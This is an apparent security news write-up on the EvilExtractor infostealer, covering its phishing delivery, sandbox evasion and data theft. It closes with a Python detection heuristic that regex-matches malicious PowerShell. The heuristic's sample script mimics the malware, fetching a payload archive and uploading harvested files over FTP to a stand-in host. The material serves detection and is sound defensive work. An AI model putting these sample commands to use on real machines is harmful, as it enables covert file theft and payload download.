EvilExtractor poses as an educational tool to deceive users

May 9, 2023
Tags: EvilExtractor, Malicious App, Educational Tool, Bogus App, Malware

A phishing campaign is distributing EvilExtractor, a data-stealing tool whose seller markets it as an educational tool. The campaign has been active since March 2023 and targets Microsoft Windows users in the United States and Europe.

Kodex developed the tool and released it in October 2022. Since then the tool has received numerous upgrades that expand its attack capabilities.

According to the investigation, the EvilExtractor authors built the tool to target Windows machines and steal data and files from endpoints. Its modules upload what they collect over FTP.

To spread through phishing emails, the tool poses as a legitimate file, such as an Adobe PDF or a Dropbox document. Once opened, it launches PowerShell to carry out its malicious activity.

That activity begins with environment checks: the tool looks for virtual machines and for signs of VirusTotal's malware scanning so that it can avoid detection. It also bundles a ransomware function, Kodex ransomware, that encrypts files on infected systems.

The main code of EvilExtractor is a PowerShell script containing modules for anti-sandbox/VM/scanner checks, data theft, log clearing, FTP server configuration, date and time checking, and upload of the stolen information.

The malware first checks whether the system date falls between November 9, 2022 and April 12, 2023. It then compares the machine's product model against a predefined list of about 187 entries, including Hyper-V, VirusTotal, VMware and other virtual machine or sandbox products.

It then downloads three components: MnMs[.]zip (a webcam extractor), KK2023[.]zip (a browser data stealer) and Confirm[.]zip (a keylogger).

The malware exfiltrates files with specific extensions from the Downloads folder and the Desktop; the confirmed extensions are jpeg, png, jpg and mp3. Finally, it can capture a screenshot with the .NET CopyFromScreen method.
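The behaviours listed above (a date-window check, a product-model comparison against VM and sandbox names, download of named components, harvesting from Downloads and Desktop, CopyFromScreen and FTP upload) can be turned into a simple triage heuristic for decoded PowerShell. The Python below is an added example written for this page; it is not code from the original report or from the tool. The component names, VM products, folder names and extensions come from the article, while the regex phrasings, the `triage`, `date_window` and `verdict` helpers and both sample scripts are constructed assumptions.

```python
"""Heuristic triage of a PowerShell script for the behaviours described
above: date-window check, VM/sandbox product check, staged component
download, media-file harvesting, screenshot capture and FTP upload.

Added example: not the real EvilExtractor code and not the article's own
code. Only the component names, VM products, folder names and extensions
are taken from the write-up; every regex and both samples are constructed.
"""
import re

INDICATORS = {
    # Component names reported in the write-up.
    "component_download": re.compile(r"MnMs\.zip|KK2023\.zip|Confirm\.zip", re.I),
    # Product model lookup plus the VM/sandbox names reported in the write-up.
    "vm_product_check": re.compile(r"Win32_ComputerSystem|Hyper-V|VirusTotal|VMware", re.I),
    # Get-Date compared with -lt/-gt/-le/-ge on the same line (assumed phrasing).
    "date_window_check": re.compile(r"Get-Date[^\n]*-(?:gt|lt|ge|le)\b", re.I),
    # .NET screenshot method named in the write-up.
    "screenshot": re.compile(r"CopyFromScreen", re.I),
    # FTP exfiltration: URL scheme or the .NET FTP client class (assumed phrasing).
    "ftp_upload": re.compile(r"ftp://|FtpWebRequest|WebRequestMethods\.Ftp", re.I),
    # Harvesting from the user folders reported in the write-up.
    "user_folder_harvest": re.compile(r"\\(?:Downloads|Desktop)\b", re.I),
    # Wildcard filters for the media extensions reported in the write-up.
    "media_extension_filter": re.compile(r"\*\.(?:jpe?g|png|mp3)\b", re.I),
}

DATE_LITERAL = re.compile(r"\d{4}-\d{2}-\d{2}")


def triage(script: str) -> dict[str, list[str]]:
    """Return, per behaviour, the distinct matching substrings found in the script."""
    hits = {}
    for name, pattern in INDICATORS.items():
        found = sorted({m.group(0) for m in pattern.finditer(script)})
        if found:
            hits[name] = found
    return hits


def date_window(script: str) -> list[str]:
    """ISO date literals on lines that compare the current date (the gating window)."""
    dates = []
    for line in script.splitlines():
        if INDICATORS["date_window_check"].search(line):
            dates.extend(DATE_LITERAL.findall(line))
    return dates


def verdict(script: str, threshold: int = 3) -> str:
    """'suspicious' when at least `threshold` distinct behaviours co-occur."""
    return "suspicious" if len(triage(script)) >= threshold else "benign"


# Constructed sample modelled on the behaviours in the write-up. It is not
# the real script: the host is a reserved .invalid name and nothing here runs.
SAMPLE_SUSPICIOUS = r'''
if ((Get-Date) -lt [datetime]"2022-11-09" -or (Get-Date) -gt [datetime]"2023-04-12") { exit }
$model = (Get-CimInstance Win32_ComputerSystem).Model
if ($model -match "VMware|Hyper-V") { exit }
Invoke-WebRequest -Uri "http://example.invalid/KK2023.zip" -OutFile "$env:TEMP\KK2023.zip"
$files = Get-ChildItem "$env:USERPROFILE\Downloads","$env:USERPROFILE\Desktop" -Include *.jpg,*.png,*.mp3 -Recurse
$gfx.CopyFromScreen(0, 0, 0, 0, $bmp.Size)
$req = [System.Net.FtpWebRequest]::Create("ftp://example.invalid/upload")
'''

# Constructed benign admin script: uses Get-Date and the Desktop folder, but
# with no date comparison and only one of the behaviours above.
SAMPLE_BENIGN = r'''
$stamp = Get-Date -Format yyyyMMdd
Copy-Item "$env:USERPROFILE\Desktop\report.docx" "D:\backup\report-$stamp.docx"
'''

if __name__ == "__main__":
    for label, sample in (("suspicious", SAMPLE_SUSPICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, verdict(sample), triage(sample), date_window(sample))
```

Run this over the decoded form of a script, for example the script block text that PowerShell Script Block Logging records (event ID 4104), rather than over an encoded or obfuscated file as delivered. A single hit such as a Desktop path is ordinary admin activity, which is why the verdict only fires when several behaviours co-occur.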

EvilExtractor is a capable information stealer with several malicious features, and its persistence and evasion are likely to be improved further. Windows users should be wary of this newly discovered infostealer and avoid opening attachments or links in emails from unknown senders.